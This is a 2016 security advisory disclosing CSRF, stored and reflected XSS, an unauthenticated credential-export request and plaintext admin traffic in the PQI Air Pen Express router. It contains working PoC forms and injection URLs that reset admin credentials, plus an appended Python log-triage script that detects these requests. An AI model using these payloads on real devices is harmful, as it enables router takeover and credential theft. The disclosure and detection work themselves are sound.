Orwelllabs Security Advisory
2016-04-03
www.orwelllabs.com
Twitter: @orwelllabs
magicword: d0ubl3th1nk1ng...

Overview
========
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: PQI Group
Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and 6W51-0000R2XXX
Credits: Discovered and researched by Orwelllabs
Advisory URL: http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html

Issues
======
I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352)
II. Multiple Stored Cross-site Scripting (CWE-79)
III. Multiple Reflected Cross-Site Scripting (CWE-79)
IV. Insecure Direct Request
V. Insecure Default Permissions (CWE-276)
VI. No SSL

Background
==========
The smart lipstick-shaped PQI Air Pen Express is the world's smallest wireless router/access point combo you can get today. The PQI Air Pen Express can be powered via an external adapter or a powered USB port on your computer and provides an excellent wireless experience for everyone.

I. Cross-Site Request Forgery (CSRF) (CWE-352)
==============================================
If a user visits the page below, it will set the administrative credentials of the PQI Air Pen Express to "root:r00t":

<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://{airpenXweb}/goform/setSysAdm" method="POST">
      <input type="hidden" name="admuser" value="root" />
      <input type="hidden" name="admpass" value="r00t" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

The attacker can also abuse the multiple XSS issues in this device to exploit this vulnerability; something like the following sets the same credentials 'root:r00t':

http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!--

The following PoC will set the credentials on the access point to "3groot:3gr00t" (and of course any other value could be set this way):

<html>
  <!-- CSRF PoC2 -->
  <body>
    <form action="http://{airpenXweb}/goform/setWan" method="POST">
      <input type="hidden" name="connectionType" value="DHCP" />
      <input type="hidden" name="staticIp" value="xxx.xxx.xxx.xxx" />
      <input type="hidden" name="staticNetmask" value="255.255.255.0" />
      <input type="hidden" name="staticGateway" value="xxx.xxx.xxx.xxx" />
      <input type="hidden" name="staticPriDns" value="xxx.xxx.xxx.x" />
      <input type="hidden" name="staticSecDns" value="xxx.xxx.xxx.x" />
      <input type="hidden" name="hostname" value="" />
      <input type="hidden" name="pppoeUser" value="pppoe_user" />
      <input type="hidden" name="pppoePass" value="pppoe_passwd" />
      <input type="hidden" name="pppoePass2" value="pppoe_passwd" />
      <input type="hidden" name="pppoeOPMode" value="KeepAlive" />
      <input type="hidden" name="pppoeRedialPeriod" value="60" />
      <input type="hidden" name="pppoeIdleTime" value="5" />
      <input type="hidden" name="l2tpServer" value="l2tp_server" />
      <input type="hidden" name="l2tpUser" value="l2tp_user" />
      <input type="hidden" name="l2tpPass" value="l2tp_passwd" />
      <input type="hidden" name="l2tpMode" value="0" />
      <input type="hidden" name="l2tpIp" value="192.168.1.1" />
      <input type="hidden" name="l2tpNetmask" value="255.255.255.0" />
      <input type="hidden" name="l2tpGateway" value="192.168.1.254" />
      <input type="hidden" name="l2tpOPMode" value="KeepAlive" />
      <input type="hidden" name="l2tpRedialPeriod" value="60" />
      <input type="hidden" name="pptpServer" value="pptp_server" />
      <input type="hidden" name="pptpUser" value="pptp_user" />
      <input type="hidden" name="pptpPass" value="pptp_passwd" />
      <input type="hidden" name="pptpMode" value="0" />
      <input type="hidden" name="pptpIp" value="192.168.1.1" />
      <input type="hidden" name="pptpNetmask" value="255.255.255.0" />
      <input type="hidden" name="pptpGateway" value="192.168.1.254" />
      <input type="hidden" name="pptpOPMode" value="KeepAlive" />
      <input type="hidden" name="pptpRedialPeriod" value="60" />
      <input type="hidden" name="APN3G" value="" />
      <input type="hidden" name="PIN3G" value="" />
      <input type="hidden" name="Dial3G" value="" />
      <input type="hidden" name="User3G" value="3groot" />       <!-- 3G User -->
      <input type="hidden" name="Password3G" value="3gr00t" />   <!-- 3G Password -->
      <input type="hidden" name="Dev3G" value="Auto" />
      <input type="hidden" name="macCloneEnbl" value="0" />
      <input type="hidden" name="macCloneMac" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

II. Stored Cross-site Scripting (CWE-79)
========================================
"Wide Area Network (WAN) Settings"
# PoC Parameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[ * STOREDXSS *]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=

"Webs URL Filter Settings"
# PoC Parameter: "addURLFilter"
http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS* ]&addwebsurlfilter=Add

A request to this page will show a pop-up with the content of the JavaScript payload:
http://{airpenXweb}/firewall/content_filtering.asp

# Parameter: "addHostFilter"
http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS* ]&addwebscontentfilter=Add

III. Reflected Cross-Site Scripting (CWE-79)
============================================
Virtually all application inputs are vulnerable to cross-site scripting, since no validation is performed on the data provided by the user. Below are some examples:

"Basic Wireless Settings"
# PoC Parameter: "mssid_0"
http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[* XSS * ]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1

# PoC Parameter: "ssid"
http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS * ]&security_mode=Disable&wzsecureAlgorithm=AES

# PoC Parameter: "hostname"
http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS -*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac=

# Parameter: "admpass"
http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ]

IV. Insecure Direct Request
===========================
This device allows remote attackers to obtain sensitive information, including all stored credentials, via a direct request to /cgi-bin/ExportSettings.sh.

PoC:
http://{airpenXweb}/cgi-bin/ExportSettings.sh

V. Insecure Default Permissions (CWE-276)
=========================================
In the device description (on the vendor's site) it is very clear that the priority is to make everything easy for you, including setup. Therefore it is not mandatory to configure a password for the web interface, nor to connect to the AP; this way you can find hundreds of these completely unprotected APs.

VI. No SSL
==========
Any action, whether sensitive or not, is transmitted in plain text because HTTPS is not used at any step.

POST /goform/setSysAdm HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/adm/management.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

admuser=ORWL_user&admpass=ORWL_pass

Timeline
========
2015-10-25 - Issues discovered
2015-11-04 - Vendor contacted
2015-12-12 - Another attempt to contact the vendor...
2016-02-26 - Public Disclosure

* There is no easy way to contact the vendor. Emails sent remain unanswered, and so do the site contact forms.
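Added by the editor, not part of the Orwelllabs advisory: a small Python log-triage routine that flags, in a web access log, the three request patterns described in sections I, II/III and IV above (configuration requests to the /goform/ endpoints whose Referer is not the device itself, script markup in any parameter of those endpoints, and direct requests to /cgi-bin/ExportSettings.sh). The log line format, the device address 192.0.2.1 and the sample lines are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Address of the Air Pen web interface; placeholder value (assumption, not from the advisory).
DEVICE_HOST = "192.0.2.1"
# Configuration endpoints named in the advisory's PoCs.
CONFIG_ENDPOINTS = {
    "/goform/setSysAdm", "/goform/setWan", "/goform/setWizard",
    "/goform/wirelessBasic", "/goform/websURLFilter", "/goform/websHostFilter",
}
EXPORT_SCRIPT = "/cgi-bin/ExportSettings.sh"
SCRIPT_RE = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)
# Constructed log line format: <client ip> "<method> <target>" <status> "<referer>"
LOG_RE = re.compile(r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<target>\S+)" (?P<status>\d{3}) "(?P<referer>[^"]*)"$')


def classify(line):
    """Return the list of findings for one access-log line (empty when nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    url = urlsplit(m["target"])
    findings = []
    if url.path == EXPORT_SCRIPT:
        findings.append("direct-request:" + EXPORT_SCRIPT)          # section IV
    if url.path in CONFIG_ENDPOINTS:
        # A form post forged from another site arrives with a foreign or empty Referer (section I).
        if urlsplit(m["referer"]).hostname != DEVICE_HOST:
            findings.append("csrf-suspect:" + url.path)
        # Script markup in any parameter of an unvalidated endpoint (sections II and III).
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if SCRIPT_RE.search(value):
                findings.append("xss-payload:" + name)
    return findings


def scan(lines):
    """Return (client ip, findings) for every line that produced at least one finding."""
    hits = []
    for line in lines:
        found = classify(line)
        if found:
            m = LOG_RE.match(line)
            hits.append((m["ip"] if m else "?", found))
    return hits


# Constructed sample log (not captured from a real device); the XSS payload is the one from section III.
SAMPLE_LOG = [
    '203.0.113.5 "GET /adm/management.asp" 200 "http://192.0.2.1/index.asp"',
    '203.0.113.5 "POST /goform/setSysAdm" 200 "http://192.0.2.1/adm/management.asp"',
    '203.0.113.9 "POST /goform/setSysAdm" 200 "http://attacker.example/page.html"',
    '203.0.113.9 "GET /goform/setWizard?connectionType=DHCP&ssid=%3Cscript%3Ealert%281%29%3C/script%3E&security_mode=Disable" 200 ""',
    '198.51.100.7 "GET /cgi-bin/ExportSettings.sh" 200 ""',
]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG):
        print(ip, ", ".join(found))
```

The second sample line shows why the Referer check alone is a weak signal: a legitimate change from the device's own management page passes, so the rule is a triage filter, not proof of compromise.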